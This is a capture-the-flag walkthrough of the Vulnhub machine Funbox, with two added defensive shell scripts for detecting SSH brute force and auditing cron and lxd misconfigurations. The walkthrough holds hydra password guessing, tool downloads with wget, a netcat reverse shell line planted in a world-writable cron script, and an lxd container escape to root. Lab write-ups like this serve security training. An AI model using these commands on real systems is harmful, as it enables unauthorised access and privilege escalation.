[VULNHUB] Funbox

Today we are going to hack the Vulnhub machine called Funbox. You can download it from the following link: Funbox

Enumeration


We start with an nmap scan to see which ports are open.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 09:27 CEST
Nmap scan report for funbox.home (192.168.1.67)
Host is up (0.016s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     ProFTPD
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=7/28%Time=5F1FD36D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.74 seconds
We see that Apache redirects to http://funbox.fritz.box, so we add the following line to /etc/hosts:

192.168.1.67 funbox.fritz.box

When we visit the page we see it is WordPress. We use wpscan to check whether it has any vulnerability and to enumerate users.

~ > wpscan --url "http://funbox.fritz.box/" --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.2
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://funbox.fritz.box/ [192.168.1.67]
[+] Started: Tue Jul 28 09:35:30 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://funbox.fritz.box/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://funbox.fritz.box/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://funbox.fritz.box/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://funbox.fritz.box/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://funbox.fritz.box/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Latest, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://funbox.fritz.box/index.php/feed/, https://wordpress.org/?v=5.4.2
 |  - http://funbox.fritz.box/index.php/comments/feed/, https://wordpress.org/?v=5.4.2

[+] WordPress theme in use: twentyseventeen
 | Location: http://funbox.fritz.box/wp-content/themes/twentyseventeen/
 | Latest Version: 2.3 (up to date)
 | Last Updated: 2020-03-31T00:00:00.000Z
 | Readme: http://funbox.fritz.box/wp-content/themes/twentyseventeen/readme.txt
 | Style URL: http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://funbox.fritz.box/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <==========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Tue Jul 28 09:35:35 2020
[+] Requests Done: 26
[+] Cached Requests: 36
[+] Data Sent: 6.525 KB
[+] Data Received: 257.882 KB
[+] Memory used: 159.355 MB
[+] Elapsed time: 00:00:04
We see that it finds the users admin and joe. We brute-force SSH with the user joe and the rockyou.txt wordlist.

~ > hydra -l joe -P rockyou.txt 192.168.1.67 ssh -I
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 14:54:49
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.67:22/
[22][ssh] host: 192.168.1.67   login: joe   password: 12345
We find the password for joe: it is 12345. We log in via SSH!
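From the defender's side, the hydra run above leaves a very recognisable trace in the sshd log: a burst of failed passwords from one source address, followed by an accepted one. The script below is an added example, not part of the original write-up; it counts failures per source and flags a successful password login that was preceded by at least N failures from the same address. The log lines are constructed for the example, and the parsing assumes the standard OpenSSH "Failed password for ..." / "Accepted password for ..." message format and a POSIX awk.

```sh
#!/bin/sh
# Added example (not from the Funbox write-up): detect an SSH password-guessing
# run in sshd log lines and, more importantly, a success that followed it.
# Assumes OpenSSH's standard log wording and a POSIX awk/sort.

# Constructed sample log (not captured from the machine): a guessing run
# against joe that ends in a valid password, one stray failure for root, and an
# unrelated key-based login.
SAMPLE_AUTH_LOG='Aug  4 14:54:49 funbox sshd[2001]: Failed password for invalid user admin from 192.168.1.111 port 40001 ssh2
Aug  4 14:54:49 funbox sshd[2002]: Failed password for joe from 192.168.1.111 port 40002 ssh2
Aug  4 14:54:50 funbox sshd[2003]: Failed password for joe from 192.168.1.111 port 40003 ssh2
Aug  4 14:54:50 funbox sshd[2004]: Failed password for joe from 192.168.1.111 port 40004 ssh2
Aug  4 14:54:51 funbox sshd[2005]: Accepted password for joe from 192.168.1.111 port 40005 ssh2
Aug  4 15:10:02 funbox sshd[2100]: Failed password for root from 10.0.0.5 port 51000 ssh2
Aug  4 15:12:30 funbox sshd[2101]: Accepted publickey for joe from 192.168.1.50 port 52000 ssh2'

# Read log lines on stdin; print "count ip" for failed password attempts,
# most active source first.
failed_logins_per_source() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") { fails[$(i+1)]++; break }
         }
         END { for (ip in fails) print fails[ip], ip }' | sort -rn
}

# Read log lines on stdin; print "ip user failures" for every successful
# password login preceded by at least $1 failures (default 3) from that source.
# This is the "guessing run that worked" case a responder wants paged on.
success_after_failures() {
    awk -v limit="${1:-3}" '
        /sshd\[[0-9]+\]: / {
            ip = ""; user = ""
            for (i = 1; i <= NF; i++) if ($i == "from") { ip = $(i+1); break }
            # "for joe from" vs "for invalid user admin from"
            for (i = 1; i <= NF; i++) if ($i == "for") { user = ($(i+1) == "invalid") ? $(i+3) : $(i+1); break }
        }
        /Failed password for/   { fails[ip]++ }
        /Accepted password for/ { if (fails[ip] >= limit) print ip, user, fails[ip] }
    '
}

echo "failed password attempts per source:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_per_source
echo "successful logins preceded by >= 3 failures from the same source:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | success_after_failures 3
```

Pipe a real file in (`success_after_failures 5 < /var/log/auth.log`) to use it outside the sample; a publickey login is deliberately not counted as a hit, since it was not the guessed credential that was used.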

Low Shell



~ > ssh joe@192.168.1.67
joe@192.168.1.67's password: 
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0

 * "If you've been waiting for the perfect Kubernetes dev solution for
   macOS, the wait is over. Learn how to install Microk8s on macOS."

   https://www.techrepublic.com/article/how-to-install-microk8s-on-macos/

33 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Sat Jul 18 10:02:39 2020 from 192.168.178.143
joe@funbox:~$ 
Once logged in we see that we are in a restricted shell. If we look at joe's .bash_history we can see a way to escape it:

ssh joe@funbox -t "bash --noprofile"
Knowing this, we connect again over SSH, this time bypassing the restricted shell.

~ > ssh joe@192.168.1.67 -t "bash --noprofile"
joe@192.168.1.67's password: 
Once inside, we download pspy64 from our own machine to see whether any scheduled task of interest is being run.

joe@funbox:/tmp$ wget http://192.168.1.111/pspy64
--2020-08-05 08:21:16--  http://192.168.1.111/pspy64
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                100%[=========================>]   2.94M  --.-KB/s    in 0.02s

2020-08-05 08:21:16 (126 MB/s) - ‘pspy64’ saved [3078592/3078592]
We give it execute permission.

joe@funbox:/tmp$ chmod +x pspy64
And finally we run it.

joe@funbox:/tmp$ ./pspy64
---SNIP---
2020/08/05 08:22:01 CMD: UID=1000 PID=2699   | /bin/bash /home/funny/.backup.s
---SNIP---
We can see a scheduled task that runs a script, /home/funny/.backup.sh. We check the file's permissions to see whether we can modify it.

joe@funbox:/tmp$ ls -l /home/funny/.backup.sh
-rwxrwxrwx 1 funny funny 55 Jul 18 10:15 /home/funny/.backup.sh
We have permission :) We download nc onto the machine.

joe@funbox:/tmp$ wget http://192.168.1.111/nc
--2020-08-06 07:04:53--  http://192.168.1.111/nc
Connecting to 192.168.1.111:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 35520 (35K) [application/octet-stream]
Saving to: ‘nc’

nc                    100%[=========================>]  34.69K  --.-KB/s    in 0s

2020-08-06 07:04:53 (161 MB/s) - ‘nc’ saved [35520/35520]
We give it execute permission.

joe@funbox:/tmp$ chmod +x nc
We edit the script and use nc to get a reverse shell.

joe@funbox:/tmp$ cat /home/funny/.backup.sh
#!/bin/bash
/tmp/nc -e /bin/bash 192.168.1.111 5555
We set pwncat listening:

~ > pwncat -l -p 5555
[19:17:20] received connection from 192.168.1.67:54048                    connect.py:148
[19:17:21] new host w/ hash eb16a4311e0222952063c0182d5d9541               victim.py:329
           pwncat running in /usr/bin/bash                                 victim.py:363
           pwncat is ready

Privilege Escalation


We now have funny's privileges. We see that funny is in the lxd group. We look for where the "lxd" executable is.

funny@funbox:/$ find / -name lxd 2>/dev/null
/var/snap/lxd
/var/snap/lxd/common/lxd
/snap/bin/lxd
/snap/lxd
/snap/lxd/16100/bin/lxd
/snap/lxd/16100/commands/lxd
/snap/lxd/16530/bin/lxd
/snap/lxd/16530/commands/lxd
funny@funbox:/$ 
We modify the PATH to add the folder that contains the lxd executable.

funny@funbox:/$ export PATH=/snap/bin:$PATH
We begin the privilege escalation by running lxd init. We then need to create a container and mount the host's root filesystem into a folder inside the container; being root inside the container, we can read everything under the mounted folder, which means we have access to the host's entire filesystem.

funny@funbox:/$ lxd init
We leave the remaining values at their defaults.

Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing empty disk or partition? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=5GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
We create the container.

funny@funbox:/tmp$ lxc init ubuntu:16.04 test -c security.privileged=true
Creating test
funny@funbox:/tmp$ lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
Device whatever added to test
funny@funbox:/tmp$ lxc start test
funny@funbox:/tmp$ lxc exec test bash
Finally, inside the container, we look for the root flag.

flag.txt



root@test:~# cd /mnt/root/root
root@test:/mnt/root/root# ls
flag.txt  mbox  snap
root@test:/mnt/root/root# cat flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2

End


And with that we are root on the machine.
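Both footholds on this box come down to two host misconfigurations: a script executed by a scheduled task that any user can write to (/home/funny/.backup.sh, mode 777), and an unprivileged user sitting in the lxd group, which on a stock LXD install is equivalent to root. The script below is an added audit example, not part of the original write-up; it pulls the script paths out of crontab-format lines, reports any that are writable by group or others, and lists the members of the lxd group. It assumes a find that accepts POSIX symbolic -perm modes and a POSIX awk, and every input it uses is constructed in a temporary directory.

```sh
#!/bin/sh
# Added audit example (not from the Funbox write-up): flag scripts run by
# scheduled tasks that other users can modify, and list lxd group members.
# Assumes POSIX find/awk; all inputs below are constructed, not captured.

# Read crontab-format lines on stdin and print every absolute path in the
# command part. Five time fields precede the command (one for @reboot-style
# entries); the extra user field of /etc/crontab never starts with "/", so
# both formats work.
cron_script_paths() {
    awk '
        /^[ \t]*(#|$)/ { next }                       # comments and blank lines
        { start = ($1 ~ /^@/) ? 2 : 6
          for (i = start; i <= NF; i++) if ($i ~ /^\//) print $i }
    '
}

# Print each argument that exists and has the group- or other-write bit set.
# -prune stops find from descending when the argument is a directory.
writable_by_others() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        find "$f" -prune \( -perm -g+w -o -perm -o+w \) -print
    done
}

# $1: a file in /etc/group format. Print the members of the lxd group, one per
# line (nothing if the group is absent or empty).
lxd_group_members() {
    awk -F: '$1 == "lxd" && $4 != "" {
                 n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i]
             }' "$1"
}

# Demo on constructed data mirroring what the walkthrough found.
demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\ntar czf /tmp/backup.tgz /home/funny\n' > "$dir/.backup.sh"
    chmod 777 "$dir/.backup.sh"                        # the mode seen on Funbox
    printf '# constructed crontab\n*/1 * * * * /bin/bash %s\n' "$dir/.backup.sh" > "$dir/crontab"
    printf 'root:x:0:\nlxd:x:131:funny\n' > "$dir/group"   # constructed /etc/group
    echo "scripts run by cron that other users can modify:"
    cron_script_paths < "$dir/crontab" | while read -r p; do writable_by_others "$p"; done
    echo "members of the lxd group (root-equivalent on this host):"
    lxd_group_members "$dir/group"
    rm -rf "$dir"
}
demo
```

On a real host you would feed it the user and system crontabs (`crontab -l -u funny`, /etc/crontab, /etc/cron.d/*) and /etc/group; a hit in the first list means the scheduled job is only as trustworthy as the least privileged user who can reach the file, and a hit in the second means that account can mount the host root into a privileged container exactly as shown above.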